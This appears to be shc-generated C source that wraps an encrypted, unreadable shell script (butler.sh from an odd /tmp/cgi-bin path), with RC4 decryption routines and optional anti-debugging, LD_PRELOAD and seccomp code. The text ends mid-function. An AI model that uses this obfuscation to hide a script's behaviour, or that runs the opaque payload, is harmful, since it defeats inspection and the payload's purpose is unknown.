#if 0
	shc Version 4.0.3, Generic Shell Script Compiler
	GNU GPL Version 3 Md Jahidul Hamid <jahidulhamid@yahoo.com>

	shc -r -f /tmp/cgi-bin/ajsdhada1563axa184dsanj_support/butler.sh 
#endif

static  char data [] = 
#define      opts_z	1
#define      opts	((&data[0]))
	"\012"
#define      msg1_z	65
#define      msg1	((&data[15]))
	"\213\204\303\044\217\162\374\050\213\375\211\004\273\116\271\206"
	"\263\122\367\344\157\162\132\202\106\176\314\107\062\157\361\225"
	"\236\261\221\217\171\231\165\253\011\113\353\150\020\164\273\224"
	"\302\311\367\253\326\204\036\051\134\165\370\251\250\253\024\150"
	"\344\223\324\336\345\024\262\265\123\051\066\300\017\324\107\377"
	"\170\231\274\121\105\013\214\202\207\223\077\205\003"
#define      xecc_z	15
#define      xecc	((&data[95]))
	"\346\137\342\004\241\237\213\367\300\133\313\024\054\362\245\240"
	"\352\241\012"
#define      tst1_z	22
#define      tst1	((&data[113]))
	"\135\276\303\344\035\304\232\011\111\000\221\053\043\315\356\052"
	"\100\131\274\064\210\322"
#define      msg2_z	19
#define      msg2	((&data[138]))
	"\054\243\300\361\265\303\107\314\206\215\264\076\060\076\316\327"
	"\350\154\111\272\066\003"
#define      chk1_z	22
#define      chk1	((&data[160]))
	"\024\137\212\034\043\047\375\127\063\152\013\167\071\367\240\241"
	"\032\010\126\373\234\357\367\076\216\132"
#define      lsto_z	1
#define      lsto	((&data[183]))
	"\350"
#define      chk2_z	19
#define      chk2	((&data[187]))
	"\167\257\167\013\171\140\306\307\127\127\061\305\247\270\211\172"
	"\133\050\314\233\100\073"
#define      tst2_z	19
#define      tst2	((&data[208]))
	"\310\056\255\203\277\001\304\077\056\124\042\161\236\016\133\013"
	"\064\213\177\114\146\150"
#define      shll_z	10
#define      shll	((&data[228]))
	"\071\337\241\001\062\050\206\261\075\360\346"
#define      pswd_z	256
#define      pswd	((&data[268]))
	"\204\064\216\050\156\243\207\371\375\362\020\332\345\273\367\135"
	"\153\156\073\367\314\004\045\065\110\147\244\056\110\134\242\116"
	"\227\200\032\331\067\320\141\231\232\252\247\274\204\005\354\017"
	"\143\235\170\034\166\017\071\336\055\070\007\305\225\252\023\054"
	"\053\056\005\142\377\147\373\231\021\242\125\226\250\102\245\014"
	"\337\035\050\125\054\141\064\131\232\074\037\057\346\062\133\022"
	"\141\141\164\140\310\160\371\332\023\116\160\274\220\025\310\157"
	"\063\360\305\137\121\371\271\354\065\330\033\034\013\166\056\154"
	"\327\243\314\240\024\305\172\050\023\353\344\244\001\254\024\064"
	"\234\331\224\356\323\115\332\010\045\365\045\061\153\124\235\103"
	"\370\151\343\014\057\136\064\103\111\031\347\113\305\373\177\141"
	"\325\023\120\250\141\052\261\206\040\327\270\214\053\125\317\043"
	"\277\263\060\356\022\145\061\134\176\031\247\104\025\046\245\352"
	"\072\366\222\233\040\104\042\101\033\332\315\106\060\235\152\357"
	"\121\233\336\143\001\020\277\200\051\147\304\076\215\152\051\310"
	"\140\273\143\201\000\206\302\033\140\220\141\220\056\314\200\200"
	"\150\136\343\151\157\243\352\231\012\256\330\230\030\001\141\171"
	"\275\304\372\275\113\275\330\253\116\072\074\174\007\031\101\315"
	"\116"
#define      text_z	2763
#define      text	((&data[1191]))
	"\162\175\265\160\160\305\113\126\201\102\264\354\260\360\344\175"
	"\365\012\262\075\161\127\154\272\160\256\210\276\175\176\172\360"
	"\374\060\141\155\366\254\304\167\356\171\144\237\151\110\035\137"
	"\122\317\235\304\047\011\177\227\267\010\126\065\207\321\046\203"
	"\001\207\361\367\064\265\157\042\056\323\302\230\034\337\367\157"
	"\257\225\063\326\236\263\156\126\273\304\214\102\225\263\306\227"
	"\073\267\217\157\155\376\221\233\322\124\064\356\063\053\135\342"
	"\301\221\270\140\104\046\267\000\353\103\103\201\367\011\030\062"
	"\301\250\241\056\246\063\312\170\207\376\146\272\052\304\235\353"
	"\125\126\113\231\174\002\232\150\106\335\351\075\347\002\160\251"
	"\252\021\327\120\105\242\311\315\240\060\210\313\364\045\266\111"
	"\173\002\343\370\005\175\140\113\133\112\211\102\114\371\353\367"
	"\013\303\110\120\145\021\035\006\102\245\322\066\313\211\200\107"
	"\213\144\077\220\341\240\334\075\352\145\177\067\136\153\056\152"
	"\056\166\272\224\210\330\233\312\176\155\001\112\367\201\221\202"
	"\346\320\023\307\161\357\005\134\125\204\223\264\360\302\036\037"
	"\071\331\263\301\262\117\214\060\275\215\173\264\017\014\067\365"
	"\335\112\275\116\072\302\252\217\107\076\103\067\000\142\126\072"
	"\073\012\373\355\132\210\036\027\026\231\314\046\246\003\034\203"
	"\116\332\322\210\234\175\030\344\273\134\034\274\276\163\366\372"
	"\176\362\350\330\173\007\360\221\241\274\267\107\300\323\313\016"
	"\255\235\226\112\033\257\057\326\013\114\223\312\277\212\304\076"
	"\175\255\027\370\264\007\212\125\304\101\234\204\025\150\222\303"
	"\005\051\016\040\330\075\367\344\211\213\257\111\026\164\207\223"
	"\041\236\214\325\246\026\052\152\130\307\356\155\057\201\060\065"
	"\253\076\126\204\174\116\150\006\332\027\117\360\213\326\204\254"
	"\165\020\202\033\046\255\205\177\164\164\354\244\366\035\331\241"
	"\134\060\045\331\176\216\337\130\245\056\111\061\005\315\336\173"
	"\335\141\226\004\016\034\203\203\221\160\047\207\216\001\051\352"
	"\061\116\304\260\334\243\011\202\322\122\264\327\040\223\123\376"
	"\364\351\002\002\006\206\205\230\367\255\037\205\256\111\160\340"
	"\227\064\221\164\330\233\367\252\355\253\202\016\077\325\014\063"
	"\277\016\066\305\225\274\135\215\151\175\022\030\306\203\371\136"
	"\270\212\323\220\045\313\072\023\167\274\041\266\221\056\351\120"
	"\074\040\026\322\334\164\137\105\361\162\135\270\366\126\027\256"
	"\341\353\076\007\266\171\033\055\065\075\343\307\153\315\030\250"
	"\355\056\172\311\242\332\016\224\115\154\115\103\303\145\362\244"
	"\120\060\254\006\251\307\064\337\004\027\246\160\345\277\030\322"
	"\355\223\234\220\156\253\045\273\027\163\377\333\330\361\177\050"
	"\042\054\057\313\364\143\253\370\173\121\151\140\021\201\063\377"
	"\024\317\217\202\172\265\076\222\050\075\155\001\057\355\051\121"
	"\031\131\035\015\274\310\006\253\366\254\033\265\241\130\174\346"
	"\207\061\352\004\171\047\302\142\022\364\023\175\144\216\163\202"
	"\117\072\367\222\153\066\275\364\040\375\331\204\337\027\122\323"
	"\312\006\077\206\107\026\144\344\315\354\107\261\316\152\004\137"
	"\254\351\077\043\352\134\172\040\021\007\105\276\342\256\344\256"
	"\006\334\072\265\305\170\312\047\042\121\012\163\223\036\060\150"
	"\343\276\150\306\176\215\267\131\374\074\113\253\240\156\015\076"
	"\044\267\132\200\300\215\355\077\111\120\034\301\036\014\303\004"
	"\345\307\323\346\016\045\262\100\155\254\212\237\003\247\030\105"
	"\035\220\144\372\060\017\013\134\144\032\143\050\350\107\215\024"
	"\365\327\073\041\322\043\375\254\253\014\073\377\040\053\014\160"
	"\314\110\063\247\117\005\020\251\012\305\012\057\311\301\364\113"
	"\365\207\203\307\246\060\004\165\155\161\120\225\372\054\120\107"
	"\044\123\062\155\144\064\367\144\176\377\360\223\235\346\023\353"
	"\117\004\314\211\265\273\057\356\126\050\211\335\203\102\304\304"
	"\346\053\263\372\034\173\162\012\016\303\106\071\006\367\142\136"
	"\256\360\356\220\024\033\325\202\047\033\206\142\336\033\056\272"
	"\116\120\316\345\360\341\227\376\042\066\272\051\174\000\151\005"
	"\202\337\024\107\253\305\066\212\236\126\134\330\203\017\256\213"
	"\154\356\167\067\177\367\137\032\221\256\224\053\063\344\014\151"
	"\221\162\075\277\244\074\304\157\273\263\341\100\072\154\171\153"
	"\015\353\142\346\054\001\272\222\241\214\364\022\253\005\170\223"
	"\175\023\223\162\311\157\362\267\247\251\326\277\122\275\005\226"
	"\275\171\350\036\042\037\161\243\230\050\376\241\200\371\143\370"
	"\151\056\162\150\055\206\053\076\156\121\076\324\346\253\034\266"
	"\245\213\103\312\021\310\073\306\115\251\357\245\054\341\200\220"
	"\070\367\150\052\346\223\060\252\313\070\013\320\345\356\246\365"
	"\343\327\132\112\224\252\344\255\306\165\160\066\326\257\000\311"
	"\345\243\163\036\157\075\116\244\176\073\376\333\210\203\206\261"
	"\032\034\154\161\015\053\024\207\042\340\270\374\364\073\155\370"
	"\303\331\170\127\140\211\144\316\156\274\144\143\213\104\350\264"
	"\212\344\135\217\240\337\313\136\366\362\253\104\151\102\061\022"
	"\260\074\212\214\113\065\064\303\141\156\101\352\102\156\116\230"
	"\352\102\217\320\020\125\135\176\364\016\244\046\267\110\062\100"
	"\251\000\062\165\360\132\111\232\164\217\214\246\133\225\062\014"
	"\220\043\244\201\140\147\263\152\215\207\347\237\152\377\077\045"
	"\165\360\215\154\273\347\031\325\207\061\263\321\372\265\077\362"
	"\000\256\100\215\212\176\076\002\243\163\124\244\006\222\176\210"
	"\362\255\265\231\356\262\330\000\177\346\217\124\334\007\255\325"
	"\323\012\300\101\256\254\141\276\003\116\152\223\144\170\323\120"
	"\207\115\172\007\234\044\273\100\071\364\073\110\066\053\020\104"
	"\027\113\171\315\113\211\326\026\206\041\067\335\207\374\201\311"
	"\121\115\032\375\321\322\221\106\367\132\112\166\327\107\200\333"
	"\213\303\161\000\270\240\375\245\241\225\145\374\122\120\337\170"
	"\121\212\176\323\115\356\310\367\040\323\226\211\064\372\030\104"
	"\055\150\005\044\274\370\371\062\150\137\221\220\220\023\054\126"
	"\153\156\106\110\364\337\376\370\161\336\063\013\267\346\267\101"
	"\055\166\275\115\027\354\165\047\060\027\371\162\051\025\202\125"
	"\337\100\072\243\256\156\157\163\113\021\120\374\346\132\037\135"
	"\074\072\055\034\323\117\263\151\212\105\255\203\212\007\057\214"
	"\054\221\137\350\372\231\273\327\015\042\151\152\124\155\345\326"
	"\124\125\217\007\240\270\034\213\177\232\000\003\172\063\235\373"
	"\333\260\233\232\341\217\021\074\367\246\320\345\163\320\012\225"
	"\277\027\150\265\153\316\160\002\374\045\272\112\107\042\220\377"
	"\010\144\200\341\021\375\206\005\077\063\037\311\132\207\065\006"
	"\340\222\227\264\042\132\326\242\064\111\054\165\040\204\321\361"
	"\102\343\206\023\210\262\210\260\012\046\241\231\350\034\156\223"
	"\040\331\362\160\103\120\357\167\115\227\121\065\031\233\127\245"
	"\062\007\117\212\244\143\125\134\172\322\010\326\116\110\370\226"
	"\266\046\145\300\365\025\115\376\114\222\203\237\351\316\031\356"
	"\364\133\161\030\246\137\255\043\264\052\060\217\364\355\024\350"
	"\243\217\121\136\227\200\351\161\206\370\176\365\344\107\153\362"
	"\006\027\146\042\067\367\276\371\214\311\155\043\206\165\074\320"
	"\020\373\306\132\032\231\112\334\205\304\237\255\304\132\305\062"
	"\221\174\344\313\023\005\130\240\045\202\035\034\260\261\157\324"
	"\127\073\214\307\334\235\034\045\317\024\116\201\025\070\220\016"
	"\316\270\245\072\330\251\343\015\212\301\207\311\142\151\237\010"
	"\031\126\254\102\321\033\072\255\016\213\273\062\063\237\235\016"
	"\363\364\047\111\324\031\075\073\214\321\025\024\121\100\251\322"
	"\105\032\242\377\177\022\320\213\121\174\314\340\245\301\037\111"
	"\022\123\336\343\020\012\315\230\103\041\051\330\330\353\053\034"
	"\044\232\360\210\307\235\236\020\026\037\256\354\270\006\232\163"
	"\011\213\226\260\165\264\350\040\046\304\326\320\217\047\100\173"
	"\020\317\122\014\201\072\350\256\014\254\224\153\031\033\325\017"
	"\305\010\075\232\215\132\151\233\014\204\000\372\265\274\262\202"
	"\055\332\152\325\250\357\202\223\020\150\141\203\215\207\311\231"
	"\346\067\337\273\143\364\174\333\012\311\121\117\371\332\203\160"
	"\226\127\065\136\034\044\030\071\203\143\335\240\311\171\122\210"
	"\156\377\245\223\207\030\332\376\034\034\100\020\107\366\354\217"
	"\040\311\204\373\004\255\326\120\216\352\245\161\370\264\207\036"
	"\244\277\313\221\301\147\132\270\241\144\004\374\347\020\116\360"
	"\376\035\351\030\131\301\361\304\065\146\345\041\045\330\241\337"
	"\357\114\202\341\114\224\145\070\364\127\314\055\151\206\043\140"
	"\246\311\343\116\346\235\111\136\164\013\116\354\305\320\126\010"
	"\273\345\174\024\043\215\354\110\271\341\104\314\233\021\355\130"
	"\234\336\176\277\363\101\356\230\025\037\170\272\022\075\173\216"
	"\341\352\142\161\105\031\223\246\043\074\332\261\235\134\067\355"
	"\126\200\123\160\043\053\346\327\211\250\332\017\323\326\361\123"
	"\276\062\151\216\131\041\337\031\172\173\135\005\302\201\245\344"
	"\321\216\012\340\137\171\236\203\161\041\060\305\201\063\210\256"
	"\106\363\333\341\010\122\106\274\320\330\273\154\027\150\302\073"
	"\031\267\317\170\153\020\125\203\240\356\277\131\035\073\067\167"
	"\233\257\156\127\327\142\005\007\164\263\205\377\315\272\311\206"
	"\367\155\250\046\161\002\047\001\011\243\302\133\033\133\026\141"
	"\306\117\061\335\275\064\046\163\052\065\055\132\361\214\003\112"
	"\321\313\361\253\030\164\216\165\026\217\310\025\146\116\062\367"
	"\241\270\262\037\115\207\205\315\243\225\326\003\110\103\202\131"
	"\034\151\017\171\051\024\045\303\334\352\116\311\252\335\162\003"
	"\301\124\225\353\212\060\131\001\101\222\101\016\200\337\006\071"
	"\327\177\376\046\111\373\007\025\251\151\137\300\361\313\107\247"
	"\061\225\274\263\225\022\277\074\371\277\133\164\035\310\062\274"
	"\134\012\314\171\317\272\135\155\136\260\371\043\374\356\107\050"
	"\220\323\313\151\213\153\041\143\236\302\254\032\036\167\305\314"
	"\123\275\231\263\032\220\232\305\321\235\035\332\221\113\226\312"
	"\176\161\113\244\251\161\073\356\123\235\074\152\372\262\153\307"
	"\265\033\255\323\226\257\014\237\176\243\252\001\146\362\216\004"
	"\244\311\375\275\300\115\241\233\233\246\212\322\012\176\255\352"
	"\130\234\124\224\344\245\111\224\030\132\162\023\011\114\044\153"
	"\336\015\257\312\067\235\204\176\140\157\262\130\375\233\030\274"
	"\161\132\131\265\155\104\266\144\125\012\307\172\166\021\035\317"
	"\121\335\126\347\013\172\274\240\175\172\104\112\303\132\260\256"
	"\310\335\170\177\117\072\056\052\042\143\036\274\131\312\115\243"
	"\043\076\020\377\234\055\076\153\205\341\030\171\301\373\220\154"
	"\275\363\166\250\363\242\010\363\036\170\211\025\343\260\024\160"
	"\101\023\076\145\165\132\233\302\340\250\310\002\075\375\073\022"
	"\170\152\301\373\111\306\045\266\115\103\275\240\125\350\106\211"
	"\351\155\007\271\202\070\076\302\274\167\022\057\355\324\026\025"
	"\031\347\154\116\055\173\251\230\261\244\325\203\347\264\037\252"
	"\106\362\333\120\365\245\226\356\010\351\207\112\171\374\244\300"
	"\265\370\230\111\016\014\321\142\010\310\251\272\270\276\136\004"
	"\067\045\303\111\010\151\043\110\037\014\364\305\052\222\327\371"
	"\267\163\323\164\032\057\214\044\237\245\036\123\300\323\325\225"
	"\300\173\374\060\211\033\135\112\203\067\120\016\035\136\156\032"
	"\237\365\157\117\157\144\047\114\077\136\361\165\237\127\065\140"
	"\376\070\013\112\163\252\031\217\122\247\062\226\240\007\102\067"
	"\373\037\212\076\116\324\072\036\103\221\030\216\213\254\363\110"
	"\355\061\167\113\272\044\173\335\372\310\064\024\274\230\220\162"
	"\106\134\144\370\351\236\024\314\321\332\172\363\071\176\006\153"
	"\217\370\104\016\060\374\170\261\057\350\047\041\257\301\224\340"
	"\002\340\243\031\076\267\352\375\014\057\150\151\201\115\177\270"
	"\161\337\343\337\210\247\066\227\022\155\353\227\046\260\062\337"
	"\363\241\373\317\135\055\065\061\344\341\275\252\340\254\000\335"
	"\304\221\270\201\207\235\274\213\242\147\160\311\016\351\252\024"
	"\120\333\123\310\321\243\012\155\046\303\274\374\157\316\046\201"
	"\130\230\352\374\123\300\313\300\364\277\126\266\134\145\240\354"
	"\163\101\130\021\222\023\043\365\007\251\251\053\125\261\365\150"
	"\076\056\153\005\005\251\213\153\166\004\026\132\243\164\336\003"
	"\305\230\365\326\102\253\375\214\117\144\376\316\233\344\015\121"
	"\135\324\160\060\325\361\071\376\343\127\166\354\137\021\242\126"
	"\055\357\061\270\354\277\356\373\161\117\043\064\157\250\121\131"
	"\000\075\215\001\310\177\341\374\121\241\251\317\301\126\235\016"
	"\043\330\354\164\212\320\070\027\175\054\333\162\047\136\236\022"
	"\236\075\337\033\334\344\331\166\227\021\365\361\150\102\002\073"
	"\304\270\221\111\260\344\010\124\137\347\160\007\270\026\014\044"
	"\253\205\315\377\367\056\240\267\371\225\122\104\016\361\235\130"
	"\175\306\002\124\022\236\306\256\111\203\240\254\353\235\355\115"
	"\112\051\303\062\276\015\066\326\026\362\246\256\357\305\224\275"
	"\021\036\326\077\265\146\257\106\122\314\064\117\355\005\074\310"
	"\374\027\307\003\307\255\270\002\075\100\126\011\176\344\147\232"
	"\322\104\303\222\347\123\002\064\013\302\216\211\316\343\135\103"
	"\035\130\133\067\325\116\100\366\053\332\243\366\045\367\177\164"
	"\131\354\137\362\254\030\360\135\303\034\232\043\014\143\021\165"
	"\214\227\043\144\172\137\356\344\232\061\173\214\236\344\215\265"
	"\214\036\047\052\222\233\256\225\365\362\261\303\224\054\066\163"
	"\166\373\166\352\341\370\065\061\133\123\017\167\151\021\236\064"
	"\130\322\062\205\061\035\332\115\104\353\275\105\216\242\320\242"
	"\355\212\162\072\274\164\267\326\073\201\352\146\174\120\135\175"
	"\237\012\377\130\132\263\265\011\135\103\322\240\341\236\041\353"
	"\112\234\321\224\242\164\220\273\133\276\222\212\251\243\117\117"
	"\076\326\363\272\344\371\245\130\063\333\345\207\373\030\032\106"
	"\104\125\205\261\276\030\176\225\227\223\222\350\042\114\017\173"
	"\133\202\056\011\052\346\353\161\050\225\206\044\042\264\145\366"
	"\233\032\132\202\311\337\071\274\270\335\226\023\113\246\157\203"
	"\011\007\066\104\167\163\175\063\333\230\165\101\200\110\322\217"
	"\144\330\155\264\344\066\272\217\001\103\056\015\057\232\351\335"
	"\072\115\077\027\213\133\021\025\341\172\203\250\111\131\054\002"
	"\242\071\235\072\256\131\110\257\032\244\023\101\024\147\106\205"
	"\164\310\155\256\344\133\234\344\344\144\207\344\250\354\174\127"
	"\072\257\141\365\112\323\022\012\214\000\173\013\200\075\160\171"
	"\161\044\067\024\266\357\043\103\071\212\307\172\216\244\135\014"
	"\145\061\362\043\215\041\316\252\154\312\013\102\224\227\140\300"
	"\326\317\244\012\203\062\025\135\155\244\101\023\313\065\306\216"
	"\113\071\260\317\115\132\016\331\010\002\256\323\246\314\133\367"
	"\133\056\067\032\157\230\053\361\313\052\006\233\272\210\026\157"
	"\307\250\230\005\026\231\064\003\303\205\035\034\242\053\330\153"
	"\062\020\205\242\251\260\223\164\332\231\020\225\042\046\005\351"
	"\316\235\356\344\067\043\350\373\251\006\027\113\061\360\267\143"
	"\001\074\005\252\354\231\037\307\062\057\135\124\125\142\076\044"
	"\000\055\011\070\120\361\063\371\367\113\105\051\074\374\214\075"
	"\070\222\347\045\053\007\355\136\066\112\262\214\255\360\260\255"
	"\035\271\346\156\253\031\147\243\144\254\314\240\251\131\336\341"
	"\354\306\007\027\315\365\165\004\077\050\220\355\031\101\233\067"
	"\373\201\245\247\233\015\112\000\271\027\241\142\160\177\104\134"
	"\105\114\164\023\101\352\030\200\022\251\156\054\352\011\143\346"
	"\212\010\215\045\026\327\046\317\357\307\062\137\106\167\274\214"
	"\303\060\240\004\033\270\205\055\141\363\132\113\375\275\062\210"
	"\306\277\256\334\227\324\254\206\233\337\346\341\126\242\156\031"
	"\323\016\036\356\306\243\034\050\227\166\164\224\064\246\034\373"
	"\145\312\327\375\236\204\203\071\143\151\033\271\014\211\323\337"
	"\230\362\316\137\225\353\207\055\142\373\301\226\242\336\221\007"
	"\250\151\005\107\355\210\200\121\362\234\013\377\046\337\337\276"
	"\321\255\035\146\231\244\224\373\240\125\221\102\063\043\112\334"
	"\215\117\043\173\330\244\314\313\100\327\312\146\266\251\045\210"
	"\127\102\357\360\347\203\353\210\330\175\312\014\240\025\351\056"
	"\145\014\251\075\260\165\011\361\115\323\130\004\174\175\214\323"
	"\277\174\303\247\377\257\057\330\054\372\345\315\017\316\373\165"
	"\332\244\263\213\032\274\175\150\217\325\155\014\122\372\340\022"
	"\166\243\271\165\122\351\116\177\343\063\114\363\001\107\150\334"
	"\354\033\150\006\327\345\157\147\273\334\163\016\326\124\040\114"
	"\367\332\302\112\304\020\311\247\104\026\232\105\135\003\042\111"
	"\036\212\120\366\157\277\136\053\234\322\071\162\046\132\277\036"
	"\065\202\150\371\223\062\240\327\111\073\034\246\077\077\360\135"
	"\311\101\124\071\001\262\144\235\205\236\020\253\370\320\311\055"
	"\122\062\046\345\145\307\274\256\003\331\125\102\030\106\240\341"
	"\207\365\033\211\250\177\046\055\035\067\330\026\007\242"
#define      inlo_z	3
#define      inlo	((&data[4462]))
	"\104\355\216"
#define      rlax_z	1
#define      rlax	((&data[4465]))
	"\022"
#define      date_z	1
#define      date	((&data[4466]))
	"\124"/* End of data[] */;
#define      hide_z	4096
#define SETUID 0	/* Define as 1 to call setuid(0) at start of script */
#define DEBUGEXEC	0	/* Define as 1 to debug execvp calls */
#define TRACEABLE	1	/* Define as 1 to enable ptrace the executable */
#define HARDENING	0	/* Define as 1 to disable ptrace/dump the executable */
#define BUSYBOXON	0	/* Define as 1 to enable work with busybox */

#if HARDENING
static const char * shc_x[] = {
"/*",
" * Copyright 2019 - Intika <intika@librefox.org>",
" * Replace ******** with secret read from fd 21",
" * Also change arguments location of sub commands (sh script commands)",
" * gcc -Wall -fpic -shared -o shc_secret.so shc_secret.c -ldl",
" */",
"",
"#define _GNU_SOURCE /* needed to get RTLD_NEXT defined in dlfcn.h */",
"#define PLACEHOLDER \"********\"",
"#include <dlfcn.h>",
"#include <stdlib.h>",
"#include <string.h>",
"#include <unistd.h>",
"#include <stdio.h>",
"#include <signal.h>",
"",
"static char secret[128000]; //max size",
"typedef int (*pfi)(int, char **, char **);",
"static pfi real_main;",
"",
"// copy argv to new location",
"char **copyargs(int argc, char** argv){",
"    char **newargv = malloc((argc+1)*sizeof(*argv));",
"    char *from,*to;",
"    int i,len;",
"",
"    for(i = 0; i<argc; i++){",
"        from = argv[i];",
"        len = strlen(from)+1;",
"        to = malloc(len);",
"        memcpy(to,from,len);",
"        // zap old argv space",
"        memset(from,'\\0',len);",
"        newargv[i] = to;",
"        argv[i] = 0;",
"    }",
"    newargv[argc] = 0;",
"    return newargv;",
"}",
"",
"static int mymain(int argc, char** argv, char** env) {",
"    //fprintf(stderr, \"Inject main argc = %d\\n\", argc);",
"    return real_main(argc, copyargs(argc,argv), env);",
"}",
"",
"int __libc_start_main(int (*main) (int, char**, char**),",
"                      int argc,",
"                      char **argv,",
"                      void (*init) (void),",
"                      void (*fini)(void),",
"                      void (*rtld_fini)(void),",
"                      void (*stack_end)){",
"    static int (*real___libc_start_main)() = NULL;",
"    int n;",
"",
"    if (!real___libc_start_main) {",
"        real___libc_start_main = dlsym(RTLD_NEXT, \"__libc_start_main\");",
"        if (!real___libc_start_main) abort();",
"    }",
"",
"    n = read(21, secret, sizeof(secret));",
"    if (n > 0) {",
"      int i;",
"",
"    if (secret[n - 1] == '\\n') secret[--n] = '\\0';",
"    for (i = 1; i < argc; i++)",
"        if (strcmp(argv[i], PLACEHOLDER) == 0)",
"          argv[i] = secret;",
"    }",
"",
"    real_main = main;",
"",
"    return real___libc_start_main(mymain, argc, argv, init, fini, rtld_fini, stack_end);",
"}",
"",
0};
#endif /* HARDENING */

/* rtc.c */

#include <sys/stat.h>
#include <sys/types.h>

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>

/* 'Alleged RC4' */

static unsigned char stte[256], indx, jndx, kndx;

/*
 * Reset arc4 stte. 
 */
void stte_0(void)
{
	indx = jndx = kndx = 0;
	do {
		stte[indx] = indx;
	} while (++indx);
}

/*
 * Set key. Can be used more than once. 
 */
void key(void * str, int len)
{
	unsigned char tmp, * ptr = (unsigned char *)str;
	while (len > 0) {
		do {
			tmp = stte[indx];
			kndx += tmp;
			kndx += ptr[(int)indx % len];
			stte[indx] = stte[kndx];
			stte[kndx] = tmp;
		} while (++indx);
		ptr += 256;
		len -= 256;
	}
}

/*
 * Crypt data. 
 */
void arc4(void * str, int len)
{
	unsigned char tmp, * ptr = (unsigned char *)str;
	while (len > 0) {
		indx++;
		tmp = stte[indx];
		jndx += tmp;
		stte[indx] = stte[jndx];
		stte[jndx] = tmp;
		tmp += stte[indx];
		*ptr ^= stte[tmp];
		ptr++;
		len--;
	}
}

/* End of ARC4 */

#if HARDENING

#include <sys/ptrace.h>
#include <sys/wait.h>
#include <signal.h>
#include <sys/prctl.h>
#define PR_SET_PTRACER 0x59616d61

/* Seccomp Sandboxing Init */
#include <stdlib.h>
#include <stdio.h>
#include <stddef.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>

#include <sys/types.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <sys/socket.h>

#include <linux/filter.h>
#include <linux/seccomp.h>
#include <linux/audit.h>

#define ArchField offsetof(struct seccomp_data, arch)

#define Allow(syscall) \
    BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, SYS_##syscall, 0, 1), \
    BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_ALLOW)

struct sock_filter filter[] = {
    /* validate arch */
    BPF_STMT(BPF_LD+BPF_W+BPF_ABS, ArchField),
    BPF_JUMP( BPF_JMP+BPF_JEQ+BPF_K, AUDIT_ARCH_X86_64, 1, 0),
    BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_KILL),

    /* load syscall */
    BPF_STMT(BPF_LD+BPF_W+BPF_ABS, offsetof(struct seccomp_data, nr)),

    /* list of allowed syscalls */
    Allow(exit_group),  /* exits a process */
    Allow(brk),         /* for malloc(), inside libc */
    Allow(mmap),        /* also for malloc() */
    Allow(munmap),      /* for free(), inside libc */

    /* and if we don't match above, die */
    BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_KILL),
};
struct sock_fprog filterprog = {
    .len = sizeof(filter)/sizeof(filter[0]),
    .filter = filter
};

/* Seccomp Sandboxing - Set up the restricted environment */
void seccomp_hardening() {
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)) {
        perror("Could not start seccomp:");
        exit(1);
    }
    if (prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &filterprog) == -1) {
        perror("Could not start seccomp:");
        exit(1);
    }
} 
/* End Seccomp Sandboxing Init */

void shc_x_file() {
    FILE *fp;
    int line = 0;

    if ((fp = fopen("/tmp/shc_x.c", "w")) == NULL ) {exit(1); exit(1);}
    for (line = 0; shc_x[line]; line++)	fprintf(fp, "%s\n", shc_x[line]);
    fflush(fp);fclose(fp);
}

int make() {
	char * cc, * cflags, * ldflags;
    char cmd[4096];

	cc = getenv("CC");
	if (!cc) cc = "cc";

	sprintf(cmd, "%s %s -o %s %s", cc, "-Wall -fpic -shared", "/tmp/shc_x.so", "/tmp/shc_x.c -ldl");
	if (system(cmd)) {remove("/tmp/shc_x.c"); return -1;}
	remove("/tmp/shc_x.c"); return 0;
}

void arc4_hardrun(void * str, int len) {
    //Decode locally
    char tmp2[len];
    char tmp3[len+1024];
    memcpy(tmp2, str, len);

	unsigned char tmp, * ptr = (unsigned char *)tmp2;
    int lentmp = len;
    int pid, status;
    pid = fork();

    shc_x_file();
    if (make()) {exit(1);}

    setenv("LD_PRELOAD","/tmp/shc_x.so",1);

    if(pid==0) {

        //Start tracing to protect from dump & trace
        if (ptrace(PTRACE_TRACEME, 0, 0, 0) < 0) {
            kill(getpid(), SIGKILL);
            _exit(1);
        }

        //Decode Bash
        while (len > 0) {
            indx++;
            tmp = stte[indx];
            jndx += tmp;
            stte[indx] = stte[jndx];
            stte[jndx] = tmp;
            tmp += stte[indx];
            *ptr ^= stte[tmp];
            ptr++;
            len--;
        }

        //Do the magic
        sprintf(tmp3, "%s %s", "'********' 21<<<", tmp2);

        //Exec bash script //fork execl with 'sh -c'
        system(tmp2);

        //Empty script variable
        memcpy(tmp2, str, lentmp);

        //Clean temp
        remove("/tmp/shc_x.so");

        //Sinal to detach ptrace
        ptrace(PTRACE_DETACH, 0, 0, 0);
        exit(0);
    }
    else {wait(&status);}

    /* Seccomp Sandboxing - Start */
    seccomp_hardening();

    exit(0);
}
#endif /* HARDENING */

/*
 * Key with file invariants. 
 */
int key_with_file(char * file)
{
	struct stat statf[1];
	struct stat control[1];

	if (stat(file, statf) < 0)
		return -1;

	/* Turn on stable fields */
	memset(control, 0, sizeof(control));
	control->st_ino = statf->st_ino;
	control->st_dev = statf->st_dev;
	control->st_rdev = statf->st_rdev;
	control->st_uid = statf->st_uid;
	control->st_gid = statf->st_gid;
	control->st_size = statf->st_size;
	control->st_mtime = statf->st_mtime;
	control->st_ctime = statf->st_ctime;
	key(control, sizeof(control));
	return 0;
}

#if DEBUGEXEC
void debugexec(char * sh11, int argc, char ** argv)
{
	int i;
	fprintf(stderr, "shll=%s\n", sh11 ? sh11 : "<null>");
	fprintf(stderr, "argc=%d\n", argc);
	if (!argv) {
		fprintf(stderr, "argv=<null>\n");
	} else { 
		for (i = 0; i <= argc ; i++)
			fprintf(stderr, "argv[%d]=%.60s\n", i, argv[i] ? argv[i] : "<null>");
	}
}
#endif /* DEBUGEXEC */

void rmarg(char ** argv, char * arg)
{
	for (; argv && *argv && *argv != arg; argv++);
	for (; argv && *argv; argv++)
		*argv = argv[1];
}

void chkenv_end(void);

int chkenv(int argc)
{
	char buff[512];
	unsigned long mask, m;
	int l, a, c;
	char * string;
	extern char ** environ;

	mask = (unsigned long)getpid();
	stte_0();
